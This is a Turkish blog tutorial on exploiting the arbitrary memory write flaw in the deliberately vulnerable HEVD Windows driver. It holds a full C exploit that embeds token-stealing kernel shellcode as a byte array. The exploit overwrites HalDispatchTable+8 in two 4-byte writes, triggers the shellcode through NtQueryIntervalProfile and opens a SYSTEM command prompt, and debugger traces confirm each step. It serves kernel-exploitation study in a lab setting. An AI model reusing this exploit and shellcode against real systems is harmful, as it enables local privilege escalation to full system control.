Sayın çekirdek severler, yazı dizimizin üçüncü yazısından herkese selamlar. Bu yazıda sağı solu zafiyet dolu olan HEVD sürücümüzdeki bir başka zafiyet türünü inceleyeceğiz. Bu yazının konusu ise kullanıcı modundan, çekirdek modundaki bir alana yetkisiz bir şekilde yazma yapmamızı sağlayan, tarzancada “Arbitary Memory Write” yahu “Write, What, Where” olarak bilinen ve dilimize Hafızaya Yetkisiz Yazım yahut Yazar; Nereye, Ne Yazar (YNNY) olarak -hehe- çevirebileceğimiz bir zafiyet türü.

Zafiyetin Analizi

Öncelik bu zafiyet nedir? Nasıl çalışır kısaca ona bir değinelim. İsminden da anlaşılabileceği gibi bu tür zafiyetler bize çekirdek modunda normalde erişmeye iznimiz olmayan bir yere veri yazmamıza izin veriyor. Bu zafiyetin çok çeşitli türleri var. Mesela öyle durumlarla karşılaşıyorsunuz ki yalnızca 1 baytlık bir alana veri yazabiliyorsunuz. Ama bu 1 baytı sakın ola küçümsemeyin zira örnek vermek gerekirse bir süre önce Windows çekirdeğindeki sayısal imza kontrolünü aşmak için çekirdekteki bir baytlık bir alana yazabilmek yeterliydi. Şu anda bile bir bayt yazma yaparak yapabilecekleriniz hiç de küçümsenecek cinsten değil… Bu tür bir durumu keşfettikten sonra geriye yalnızca “exploit“i yazacağınız ortam ile ilgili bilginizi kullanarak işe yarar bir şey ortaya çıkarmak kalıyor. Zaten bu işlerin esas eğlenceli kısmı bir tanesiyle değil, birden fazla zafiyetin birleşmesiyle yazılan “exploit”‘lerde ortaya çıkıyor. Fakat bu işlerin eğlencesinin birkaç senesi kaldı sadece, onu da söyleyelim. O nedenle hayatımızın sonuna geldiğimizde tek bildiğimiz şey bunlar olmazsa bizler için daha iyi olur diye değerlendiriyorum. Neyse, işin bu tarafını bir kenara bırakalım şimdilik, o tarafla ilgili de yazılar yazmayı düşünüyorum yakın zamanda inşallah.

Pekala, o zaman ufaktan girişelim. Önceki yazılarda yaptığımız gibi öncelikle zafiyet içeren kısmın analizini yapalım. Bu zafiyeti tetikleyen fonksiyona ulaşmamızı sağlayan IOCTL 0x22200B. Kaynak koda baktığımızda bu HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE tanımına denk geliyor. Burada bizi ilk karşılayan fonksiyon şu şekilde:

; NTSTATUS __fastcall ArbitraryOverwriteIoctlHandler(PIRP Irp, PIO_STACK_LOCATION IrpSp)
ArbitraryOverwriteIoctlHandler proc near
        sub   rsp, 28h
        mov   rcx, [rdx+20h] ; Gelen veri
        mov   eax, STATUS_UNSUCCESSFUL
        test  rcx, rcx
        jz   short FAILED
        call  TriggerArbitraryOverwrite
FAILED:
        add   rsp, 28h
        retn
ArbitraryOverwriteIoctlHandler endp

Burada kayda değer bir şey yok. Kullanıcı modundan gönderilen veri TriggerArbitraryOverwrite isimli başka bir fonksiyona gönderiliyor, o kadar. Esas mesele belli ki bu fonksiyonda. O zaman ona da bir bakalım:

        ...
        ...
        xor   esi, esi    ; esi = 0
        lea   edx, [rsi+10h] ; Boyut
        lea   r8d, [rsi+8]  ; Hizalama
        call  ProbeForRead
        mov   rbx, [r12]   ; r12 = Kullanıcıdan gelen veri, rbx = Verinin ilk 8 baytlık kısmının adresi
        mov   rdi, [r12+8]  ; rdi = Gelen verinin ikinci 8 baytlık kısmının adresi
        mov   r11d, [rbx]   ; İlk kısımdaki verinin 4 baytlık kısmını r11d'ye koy
        mov   [rdi], r11d   ; Bu veriyi rdi'de tutulan adrese yaz!!!! İşte zafiyetin kilit noktası!!!
loc_15C05:               
        mov   eax, esi    ; Geri dönüş değeri = 0 -> STATUS_SUCCESFULL
        ...
        ...

Görüldüğü üzere fonksiyonumuzun bizi ilgilendiren kısmı oldukça küçük ve basit. Bize kullanıcı modundan bir veri geliyor. ProbeForRead fonksiyonuna gelen argümanlara bakılırsa bu verinin toplam boyutu 16 bayt gibi gözüküyor. Hemen devamında zaten bu veriye erişen iki minik komut görüyoruz. Buradan anlıyoruz ki bu veri yapısında iki adet 8 baytlık değer var. Bunların birinin adresi rbx yazmacına, diğeri ise rdi yazmacına alınıyor. Devamında rbx yazmacındaki adreste bulunan veri okunup r11d yazmacına alınıyor akabinde ise bu veri rdi yazmacında bulunan adrese yazılıyor. İşte bu durumda oluşan zafiyete de biz YNNY - yahut “Write, What, Where” zafiyeti diyoruz. Bu arada şuna dikkat etmekte fayda var, rbx yazmacındaki adreste bulunan verinin 4 baytlık kısmını kullanıyoruz, bu önemli. Yani biz mesela bir yere bir fonksiyon göstericisi yazmak istersek bu zafiyeti iki kere kullanmamız gerekecek çünkü işletim sistemimiz 64 bit, fakat tabi ki hiç sorun değil.

Burada elimizde şöyle bir imkan var, görüldüğü gibi kodu yazan arkadaş hiçbir doğrulama yapmamış. O zaman bu ne demektir? Biz nereye ne yazacağımızı kendimiz belirleyebiliriz! O halde esas önemli soru “neyi, nereye yazacağız?” sorusudur. Bunun elbette tek bir cevabı yok. Esasen tamamen hayal gücünüze kalmış da diyebiliriz. Mesela dünya çapında yapılan yarışmalarda bu yazı dizisinde bahsettiğimiz atıyorum 5 zafiyet türünü de kullanan “exploit”‘ler yazılıyor. Hepsi büyük resmin bir parçasını oluşturan minik resimler olarak kullanılıyor. Dolayısıyla bu tür bir zafiyet bulduğunuzda ne yapacağınız çoğunlukla o an ne tür bir durumda olduğunuz ve ne yapmak istediğinize göre değişiyor. Biz bu yazı dizisinde yetkilerimizi yükseltmek istediğimiz için yine onu yapacağız. Fakat bu yazının biraz daha ilerisinde olacak inşallah.

Zafiyetin analizi ile ilgili son olarak yine netleşmesi için C kodunun kendisini de görelim.

NTSTATUS TriggerArbitraryOverwrite(IN PWRITE_WHAT_WHERE UserWriteWhatWhere) {
  PULONG_PTR What = NULL;
  PULONG_PTR Where = NULL;
  NTSTATUS Status = STATUS_SUCCESS;

  PAGED_CODE();

  __try {
		//
    // Bize gelen veriyi kontrol et, okunuyor mu ve
    // kullanıcı modunda mı?
    //
    ProbeForRead((PVOID)UserWriteWhatWhere,
           sizeof(WRITE_WHAT_WHERE),
           (ULONG)__alignof(WRITE_WHAT_WHERE));

    What = UserWriteWhatWhere->What;
    Where = UserWriteWhatWhere->Where;

#ifdef SECURE
    //
    // Güvenli: Eğer kod bu şekilde olsaydı, bu zafiyet oluşmayacaktı. Çünkü
    // kodu yazan arkadaşımız kullanıcı modundan aldığı veriye güvenmeyip önce kontrol
    // ediyor. Burada ProbeForRead sınadığı adreslerin kullanıcı modunda olmaması durumunda
    // bir istisna fırlatıp zafiyetin oluşmasını engellemiş olacak.
    // 
    ProbeForRead((PVOID)Where, sizeof(PULONG_PTR), (ULONG)__alignof(PULONG_PTR));
    ProbeForRead((PVOID)What, sizeof(PULONG_PTR), (ULONG)__alignof(PULONG_PTR));

    *(Where) = *(What);
#else
    //
    // Güvensiz: İşte tipik bir YNNY zafiyeti. Bunun sebebi nedir? Çok basit
    // kodu yazan arkadaşımız kullanıcı modundan gelen veriye tamamiyle güvenmiş,
    // acaba bu kullanıcı moduna mı yazıyor, çekirdek moduna mı yazıyor diye kontrol
    // etmemiş. E tabi sonucu da ağır olacak...
    //
    *(Where) = *(What);
#endif
  }
  __except (EXCEPTION_EXECUTE_HANDLER) {
    Status = GetExceptionCode();
  }

  return Status;
}

Zafiyetin Tetiklenmesi

Yukarıda öğrendiklerimizle önceki yazdığımız kodları birleştirirsek basitçe şu şekilde zafiyeti tetikleyebiliriz. Burada ben “nereye” ve “ne” kısımlarına işe yaramaz bir veri veriyorum. Beklediğim şey ise, çalıştığında TriggerArbitraryOverwrite fonksiyonu içerisinde bir istisna fırlaması. Çünkü verdiğim değerlerin geçerli bir adres olmadığını biliyorum. O nedenle koddaki istisna işleyici tarafından yakalanması gerekiyor bu durumun.

Kodumuz şu şekilde:

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE CTL_CODE (FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

int main()
{
	BOOL Result       = FALSE;
	DWORD Retval      = 0;
	ULONGLONG Veri[2];
	HANDLE hDeviceHandle  = INVALID_HANDLE_VALUE;
	const WCHAR* DeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver";

	printf("*** Cekirdegi Kitliyoruz - YNNY ***\n");

	//
	// Surucuye tutamak al
	//
	hDeviceHandle = CreateFile(
		DeviceName,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if(hDeviceHandle == INVALID_HANDLE_VALUE)
	{
		printf("Surucuye tutamak alamiyoruz?!\n");
		goto RETURN;
	}

	printf("Hop, tutamak geldi : %p\n", hDeviceHandle);

	//
	// Sahte verimizi ayarla
	// NOT: Hedef sistem 64 bit, uygulama ise 32 bit
	//
	Veri[0] = 0x4242424242424242;
	Veri[1] = 0x4343434343434343;

	//
	// Hadi (b)akalım :P
	//
	Result = DeviceIoControl(
		hDeviceHandle,
		HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
		&Veri,
		sizeof(Veri),
		NULL,
		0,
		&Retval,
		NULL);

  printf("Evet, emaneti yolladik! Sonuc : %d\n", Result);

RETURN:

	if(hDeviceHandle)
	{
		CloseHandle(hDeviceHandle);
	}

  return 0;
}

Doğrulamak için hata ayıklayıcıda HEVD!TriggerArbitraryOverwrite+0x27 adresine bir durma noktası koyuyorum. Devamında uygulamayı çalıştırıyorum. Durma noktasına çarptığında r12 yazmacında gönderdiğim veri olacak. Bakalım beklediğimiz şey geldi mi?

kd> g
****** HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE ******
Breakpoint 0 hit
HEVD!TriggerArbitraryOverwrite+0x27:
fffff880`03398b9b 498b1c24    mov   rbx,qword ptr [r12]
kd> r
rax=000007ffffff0000 rbx=fffffa8303b25ee0 rcx=00000000002cfd40
rdx=00000000002cfd50 rsi=0000000000000000 rdi=fffffa8303b25fb0
rip=fffff88003398b9b rsp=fffff88004166780 rbp=fffffa8303798f20
 r8=0000000000000007 r9=0000000000000003 r10=0000000000000000
r11=fffff88004166400 r12=00000000002cfd40 r13=0000000000000000
r14=0000000000000010 r15=fffffa8303b25f01
iopl=0     nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b       efl=00000286
HEVD!TriggerArbitraryOverwrite+0x27:
fffff880`03398b9b 498b1c24    mov   rbx,qword ptr [r12] ds:002b:00000000`002cfd40=4242424242424242
kd> dq r12
00000000`002cfd40 42424242`42424242 43434343`43434343
00000000`002cfd50 01882514`8b486550 8b4d705a`8b4c0000
00000000`002cfd60 0a8b4900`00018893 04fa8348`f8518b48

Gördüldüğü üzere dq ile 8 baytlık parçalar halinde r12 yazmacındaki adrese baktığımda gönderdiğim veriyi görüyorum. Çalışmayı devam ettirelim.

kd> g
[+] UserWriteWhatWhere: 0x00000000002CFD40
[+] WRITE_WHAT_WHERE Size: 0x10
[+] UserWriteWhatWhere->What: 0x4242424242424242
[+] UserWriteWhatWhere->Where: 0x4343434343434343
[+] Triggering Arbitrary Overwrite
[-] Exception Code: 0xC0000005
****** HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE ******

Beklediğimiz gibi bir istisna fırladı ve yakalandı. İstisna kodu gördüğünüz gibi 0xC0000005, o da STATUS_ACCESS_VIOLATION demek oluyor. Tam olarak beklediğimiz sonuç.

Exploit” Yazımı

Şimdi geldik cavcaklı bölüme. Küçük bir hafıza tazeleme yaparsak bizim önceki yazılarımızda yaptığımız şey “token” çalan bir “shellcode“‘u çalıştırmaktı. Pekii, bu zafiyet türünü kullanarak bu “shellcode“‘umuzu nasıl çağıracağız? Burada çağırmaya izin veren bir şey yok ki! Sadece bir yerlere bir şeyler yazmamıza izin veriyor. Amacımız bir yerlere yazıp birtakım korumaları devre dışı bırakmak olmadığına göre, çağırılacağını bildiğimiz bir yerin adresinin üzerine bizim çakal karlos‘un adresini yazarsak nasıl olur???

Nereye Yazalım?

O halde çağırılacağını bildiğimiz bir yerin değerini değiştirelim. Mesela SSDT tablosundaki bir fonksiyon göstericinin üzerine yazsak nasıl olur? Teorik olarak olur, ama pratikte sorun çıkarır. Neden? Birincisi bu tablo PatchGuard1 kankamız tarafından korunuyor. - Gerçi biraz sonra göstereceğimiz yer de korunuyor da, neyse, bizim işimizi görmek için yeterli zamanımız olacak hehe- Burada yaptığımız bir değişiklik onu sinirlendirecektir. İkincisi ve esas önemlisi, işletim sisteminin iç işleyişini mümkün oldukça bozmamamız gerekiyor. Saniyede binlerce çağrı oluyor bu sistemde, bizim yapacağımız bu değişiklik ortalığı ciddi anlamda karıştırabilir.

Hmm. O halde bu demektir ki bize tenha bir yer lazım. Çok fazla çağırılmayan, çağırılsa da sağı solu patlatmayan bir şey. O zaman neden HalDispatchTable‘ı denemeyelim? Hem yazılabilir hem de nadir kullanılan bir alan neticede??? 2007’de bir vatandaşın aklına gelmiş bu yöntem. Bir sunumda bahsetmişti fakat şu an adını getiremedim. Peki olay nedir? Çok basit. Windows’daki donanım soyutlama katmanının (HAL) işini yaparken kullandığı SSDT gibi bir tablo burası. Fakat SSDT’ye göre çok daha nadir kullanılıyor. Biz bu tablonun ikinci sırasındaki fonksiyon göstericisini, bizim “shellcode“‘umuzun adresi ile değiştirirsek iş tamamdır. Ha, “yahu bunu buraya koyduk da, nasıl çağırılacak bu???”” diyenleri duyar gibiyim, onun için de başka bir fonksiyon devreye girecek : NtQueryIntervalProfile.

Öncelikle bu tablonun değiştireceğimiz kısmında ne var onu göstereyim:

kd> dq nt!HalDispatchTable
fffff800`02810cb0 00000000`00000004 fffff800`02c438e8
fffff800`02810cc0 fffff800`02c44470 fffff800`02a0f5e0
fffff800`02810cd0 00000000`00000000 fffff800`026db170
fffff800`02810ce0 fffff800`029b4b50 fffff800`029b528c
fffff800`02810cf0 fffff800`02afdf60 fffff800`026befe0
fffff800`02810d00 fffff800`02683490 fffff800`02683490
fffff800`02810d10 fffff800`02c42ca4 fffff800`02c43e88
fffff800`02810d20 fffff800`02c18534 fffff800`02c42c18
kd> u fffff800`02c438e8
hal!HaliQuerySystemInformation:
fffff800`02c438e8 fff3      push  rbx
fffff800`02c438ea 55       push  rbp
fffff800`02c438eb 56       push  rsi
fffff800`02c438ec 57       push  rdi
fffff800`02c438ed 4154      push  r12
fffff800`02c438ef 4881ec40010000 sub   rsp,140h
fffff800`02c438f6 488b0503b8feff mov   rax,qword ptr [hal!_security_cookie (fffff800`02c2f100)]
fffff800`02c438fd 4833c4     xor   rax,rsp
kd> !pte nt!HalDispatchTable
                      VA fffff80002810cb0
PXE at FFFFF6FB7DBEDF80  PPE at FFFFF6FB7DBF0000  PDE at FFFFF6FB7E0000A0  PTE at FFFFF6FC00014080
contains 0000000000199063 contains 0000000000198063 contains 00000000028009E3 contains 0000000000000000
pfn 199    ---DA--KWEV pfn 198    ---DA--KWEV pfn 2800   -GLDA--KWEV LARGE PAGE pfn 2810    

Görüldüğü üzre HaliQuerySystemInformation fonksiyonu var. Biz bu fonksiyonun yerine kendi “token” çalan kod parçacığımızı koyacağız. Bu kod parçacığının çağırılmasını da resmi olarak belgelere geçmemiş olan NtQueryIntervalProfile fonksiyonu yapacak. Fonksiyonun öntanımı şu şekilde :

NTSTATUS 
NtQueryIntervalProfile (
  KPROFILE_SOURCE ProfileSource, 
  ULONG *Interval
  );

Bu fonksiyonu incelediğimizde ise şöyle makine kodlarıyla karşılaşıyoruz:

kd> u nt!NtQueryIntervalProfile+0x22
nt!NtQueryIntervalProfile+0x22:
fffff800`02a1c7a2 488b055728ebff mov   rax,qword ptr [nt!MmUserProbeAddress (fffff800`028cf000)]
fffff800`02a1c7a9 483bd0     cmp   rdx,rax
fffff800`02a1c7ac 480f43d0    cmovae rdx,rax
fffff800`02a1c7b0 8b02      mov   eax,dword ptr [rdx]
fffff800`02a1c7b2 8902      mov   dword ptr [rdx],eax
fffff800`02a1c7b4 eb02      jmp   nt!NtQueryIntervalProfile+0x38 (fffff800`02a1c7b8)
fffff800`02a1c7b6 eb14      jmp   nt!NtQueryIntervalProfile+0x4c (fffff800`02a1c7cc)
fffff800`02a1c7b8 e8830affff   call  nt!KeQueryIntervalProfile (fffff800`02a0d240) <----------- Dikkat
kd> u nt!KeQueryIntervalProfile+0x1b
nt!KeQueryIntervalProfile+0x1b:
fffff800`02a0d25b eb2f      jmp   nt!KeQueryIntervalProfile+0x4c (fffff800`02a0d28c)
fffff800`02a0d25d ba0c000000   mov   edx,0Ch
fffff800`02a0d262 894c2420    mov   dword ptr [rsp+20h],ecx
fffff800`02a0d266 4c8d4c2440   lea   r9,[rsp+40h]
fffff800`02a0d26b 8d4af5     lea   ecx,[rdx-0Bh]
fffff800`02a0d26e 4c8d442420   lea   r8,[rsp+20h]
fffff800`02a0d273 ff153f3ae0ff  call  qword ptr [nt!HalDispatchTable+0x8 (fffff800`02810cb8)] <----------- Dikkat
fffff800`02a0d279 85c0      test  eax,eax

Görüldüğü üzere bu fonksiyon HalDispatchTable + 0x8 adresindeki fonksiyonu çağırıyor. Tamamdır o zaman, her şey hazır geriye sadece “exploit”‘i yazmak kaldı. O halde kaba taslak yapmamız gerekenleri belirleyelim:

 1. HalDispatchTable‘ın adresini bul
 2. “Shellcode”‘umuzu hazırla ve adresini al
 3. İki kere zafiyetli fonksiyonu çağırarak bu adresi HalDispatchTable‘a yerleştir.
 4. NtQueryIntervalProfile fonksiyonunu çağırarak fonksiyon çağırımını tetikle

HalDispatchTable Adresinin Bulunması

Yapılacaklar listemizdeki tek muamma HalDispatchTable‘ın adresi. Malumunuz işletim sistemlerindeki ASLR koruması nedeniyle modüllerin hafıya yüklenmesi sırasında taban adresleri değiştirilmekte. Bu nedenle bu HalDispatchTable her zaman sabit bir adreste durmuyor, bunun adresini bulmamız gerekiyor. Zor bir şey mi? Hiç değil. Tek yapmamız gereken şey çekirdeğin taban adresini bulmak, ardından kullanıcı modunda bir çekirdeği daha hafızaya eşleyip bunun aracılığıyla HalDispatchTable‘ın taban adrese olan uzaklığını bulmak. Bunu yapınca HalDispatchTable‘ın adresini de bulmuş olacağız.

O halde ilk gereken şey çekirdeğin taban adresi. Bunu almak için NtQuerySystemInformation fonksiyonunu SystemModuleInformation parametresi ile çağırabilirsiniz. Bunu yaptığınızda bu fonksiyon size sistemde bulunan modüller ile ilgili bilgiler dönecek. Yanılmıyorsam ilk sırada çekirdeğin bilgileri var. Buradan taban adresinı alıyoruz, cepte.

Devamında LoadLibrary ile NT çekirdeğini hafızaya yükleyip, bu fonksiyonun döndüğü tutamak ile çekirdek modulünde HalDispatchTable adresini GetProcAddress ile alıyoruz. Etti mi cepte 2. Sonrasında LoadLibrary ile yüklediğiniz çekirdeğin taban adresini GetProcAddress‘in döndüğü değerden çıkarırsanız, HalDispatchTable‘ın taban adresine olan uzaklığını bulmuş olursunuz. Devamında ise ilk başta cebe attığımız esas çekirdeğin taban adresine bunu eklediğinizde sisteminizdeki çalışır durumda olan HalDispatchTable‘ın adresini bulmuş olacaksınız. Aşağıdaki “exploit”‘te bu kısmı yapan kodu vermeyeceğim, sizlere bir alıştırma olarak bırakıyorum. Bu alıştırmayı yapmak isteyenlerden ricam lütfen internetten hazır kodlara bakmadan, sadece fonksiyon öntanımları ile hareket ederek yapsınlar, kendileri için de çok güzel olur…

Büyük Patlama Aşaması

Evet artık sona geldik, yukarıda dediğim gibi çalışma zamanında HalDispatchTable‘ın adresini bulmayı size bıraktığım için burada ben hata ayıklayıcıdan HalDispatchTable‘ın adresini alarak devam edeceğim.

kd> dq nt!HalDispatchTable
fffff800`02847cb0 00000000`00000004 fffff800`026458e8
fffff800`02847cc0 fffff800`02646470 fffff800`02a465e0

Gördüğünüz üzre başlangıç adresi 0xfffff80002847cb0 olarak görünüyor. Ne demiştik? İkinci sıradaki fonksiyon göstericiyi değiştireceğiz. 64 bit sistem olduğunu da düşünürsek hedefimiz 0xfffff80002847cb0 + 8.

Geriye sadece “shellcode”‘umuzun adresini buraya yazmak kalıyor. Bunu da yukarıda değindiğimiz sebepten ötürü iki adımda yapacağız. Kodumuzun son hali şu şekilde:

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE CTL_CODE (FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef NTSTATUS(WINAPI *NtQueryIntervalProfile_t)(
	IN ULONG ProfileSource,
	OUT PULONG Interval
	);

int main()
{
	BOOL Result = FALSE;
	DWORD Retval = 0;
	HANDLE hDeviceHandle = INVALID_HANDLE_VALUE;
	const WCHAR* DeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver";

	ULONG Interval = 0;
	ULONGLONG Veri[2], Ne;
	NtQueryIntervalProfile_t a_NtQueryIntervalProfile = NULL;

	printf("*** Cekirdegi Kitliyoruz - YNNY ***\n");

	//
	// "Token" calan parcacik
	//
	unsigned char cakal[57] = {
		0x50, 0x65, 0x48, 0x8B, 0x14, 0x25, 0x88, 0x01, 0x00, 0x00, 0x4C, 0x8B,
		0x5A, 0x70, 0x4D, 0x8B, 0x93, 0x88, 0x01, 0x00, 0x00, 0x49, 0x8B, 0x0A,
		0x48, 0x8B, 0x51, 0xF8, 0x48, 0x83, 0xFA, 0x04, 0x74, 0x05, 0x48, 0x8B,
		0x09, 0xEB, 0xF1, 0x48, 0x8B, 0x81, 0x80, 0x00, 0x00, 0x00, 0x24, 0xF0,
		0x49, 0x89, 0x83, 0x08, 0x02, 0x00, 0x00, 0x58, 0xC3
	};

	//
	// Adresini sakla lazım olacak
	//
	Ne = (ULONGLONG)&cakal;

	//
	// Parcacigin alanini calistirilabilir yap
	//
	DWORD oldProtect;
	VirtualProtect(cakal, sizeof(cakal), PAGE_EXECUTE_READWRITE, &oldProtect);

	//
	// Surucuye tutamak al
	//
	hDeviceHandle = CreateFile(
		DeviceName,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if (hDeviceHandle == INVALID_HANDLE_VALUE)
	{
		printf("Surucuye tutamak alamiyoruz?!\n");
		goto RETURN;
	}

	printf("Hop, tutamak geldi : %p\n", hDeviceHandle);

	//
	// Adresin alt kısmını yaz
	//
	Veri[0] = (ULONGLONG)&Ne;
	Veri[1] = 0xfffff80002847cb0 + 8;

	//
	// Hadi (b)akalım :P
	//
	Result = DeviceIoControl(
		hDeviceHandle,
		HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
		&Veri,
		sizeof(Veri),
		NULL,
		0,
		&Retval,
		NULL);

	//
	// Adresin üst kısmını yaz
	//
	Veri[0] = (ULONGLONG)((PCHAR)&Ne + 4);
	Veri[1] = 0xfffff80002847cb0 + 8 + 4;

	//
	// Hadi (b)akalım :P
	//
	Result = DeviceIoControl(
		hDeviceHandle,
		HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
		&Veri,
		sizeof(Veri),
		NULL,
		0,
		&Retval,
		NULL);

	printf("Evet, emaneti yolladik! Sonuc : %d\n", Result);

	//
	// Çağrıyı tetikle
	//
	a_NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(GetModuleHandleA("ntdll"), "NtQueryIntervalProfile");
	if (a_NtQueryIntervalProfile == NULL)
	{
		printf("Adresi alamiyoruz?!\n");
		goto RETURN;
	}

	//
	// TİK TAK TİK TAK
	//
	a_NtQueryIntervalProfile(0xBeBe, &Interval);
	system("cmd");

RETURN:

	if (hDeviceHandle)
	{
		CloseHandle(hDeviceHandle);
	}

	return 0;
}

Sanıyorum oldukça anlaşılır. IOCTL’i iki defa gönderiyoruz. Birinde kodumuzun alt kısmının adresini, diğerinde ise üst kısmının adresini hedefimize yazdırıyoruz. Eğer bu alıştırmayı 32 bit işletim sisteminde yapacaksanız buna gerek olmadığına dikkat edin. Orada zaten gösterici boyutları 32 bit olduğu için tek seferde bu yazma işlemini gerçekleştirebilirsiniz.

Son olarak yazdığımız kodu test edip, yetki yükseltme yapıp yapmadığımızı kontrol edelim. Ha, bu arada “shellcode”‘umuz önceki yazının aynısı. Burada da kodun olağan işleyişini bozmadığımız için düz bir şekilde ret komutunu çalıştırmak yeterli.

Öncelikle sıra sıra işleyişi hata ayıklayıcıdan takip edelim:

kd> bp nt!KeQueryIntervalProfile+0x33
kd> bp HEVD!TriggerArbitraryOverwrite+0x7b
kd> g
****** HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE ******
[+] UserWriteWhatWhere: 0x00000000002CF938
[+] WRITE_WHAT_WHERE Size: 0x10
[+] UserWriteWhatWhere->What: 0x00000000002CF928
[+] UserWriteWhatWhere->Where: 0xFFFFF80002847CB8
[+] Triggering Arbitrary Overwrite
kd> dq r12 l2
00000000`002cf938 00000000`002cf928 fffff800`02847cb8
kd> u poi(00000000`002cf928) l5
00000000`002cf948 50       push  rax
00000000`002cf949 65488b142588010000 mov  rdx,qword ptr gs:[188h]
00000000`002cf952 4c8b5a70    mov   r11,qword ptr [rdx+70h]
00000000`002cf956 4d8b9388010000 mov   r10,qword ptr [r11+188h]
00000000`002cf95d 498b0a     mov   rcx,qword ptr [r10]
kd> r rdi, r11d
rdi=fffff80002847cb8 r11d=2cf948

“Shellcode”‘umuz 0x00000000002cf948 adresinde, bu adresi 0xfffff80002847cb8 adresine yazacağız. r11d yazmacında yazılacak olan, rdi yazmacında ise nereye yazılacağı yazıyor. Görüldüğü üzere biri HalDispatchTable + 8 iken, diğeri “shellcode”‘umuzun adresinin alt kısmı.

İkinci yarısıyla devam edelim:

kd> g
****** HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE ******
****** HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE ******
[+] UserWriteWhatWhere: 0x00000000002CF938
[+] WRITE_WHAT_WHERE Size: 0x10
[+] UserWriteWhatWhere->What: 0x00000000002CF92C
[+] UserWriteWhatWhere->Where: 0xFFFFF80002847CBC
[+] Triggering Arbitrary Overwrite
kd> dq r12 l2
00000000`002cf938 00000000`002cf92c fffff800`02847cbc
kd> dd rbx l2
00000000`002cf92c 00000000 <---- Bu sıfırlı kısım alınıp, rdi'deki adrese yazılacak
kd> dd rbx-4 l1
00000000`002cf928 002cf948 <---- Bir önceki gönderdiğimizde böyleydi
kd> r rdi
rdi=fffff80002847cbc
kd> r r11d
r11d=0

Dikkat ederseniz burada iki adres de kodda istediğimiz biçimde 4 artımış durumda. Bu defa nereye sorusunun cevabı 0xfffff80002847cbc, ne sorusunun cevabı ise 0. Kodumuzu devam ettirdiğimizde HalDispatchTable‘ı kontrol edersek “shellcode”‘umuzun geldiğini görebiliriz:

kd> dq nt!HalDispatchTable
fffff800`02847cb0 00000000`00000004 00000000`002cf948 <---- Buradayız
fffff800`02847cc0 fffff800`02646470 fffff800`02a465e0
fffff800`02847cd0 00000000`00000000 fffff800`02712170
kd> u poi(nt!HalDispatchTable+0x8) l8
00000000`002cf948 50       push  rax
00000000`002cf949 65488b142588010000 mov  rdx,qword ptr gs:[188h]
00000000`002cf952 4c8b5a70    mov   r11,qword ptr [rdx+70h]
00000000`002cf956 4d8b9388010000 mov   r10,qword ptr [r11+188h]
00000000`002cf95d 498b0a     mov   rcx,qword ptr [r10]
00000000`002cf960 488b51f8    mov   rdx,qword ptr [rcx-8]
00000000`002cf964 4883fa04    cmp   rdx,4
00000000`002cf968 7405      je   00000000`002cf96f

Her şey tamam gözüküyor! Hata ayıklayıcıyı devam ettirip, yetki yükseltme olup olmadığını kontrol edelim:

Görüldüğü üzere bir kez daha sistem yetkilerine ulaşmış olduk…

Peki bunları niye anlatıyoruz? Ne işe yarayacak? Aslında tamamen sizin seçiminize kalmış. Bu blogda yazılan her şey hem iyi niyetle hem de kötü niyetle kullanılabilir. Benim bunları yazma amacım başta kendim için önden bir şeyler gönderebilmek, sonrasında ise kendi dilimizde aradığımızda ulaşılabilecek bilgi kaynağı kazandırmak. Umuyorum ki buradan edindiğiniz bilgileri iyiye dair olan fikirlerinizle birlikte kullanırsınız.

Selametle.

 1. Sistemdeki önemli veri yapılarını korumakla görevli bir mekanizma.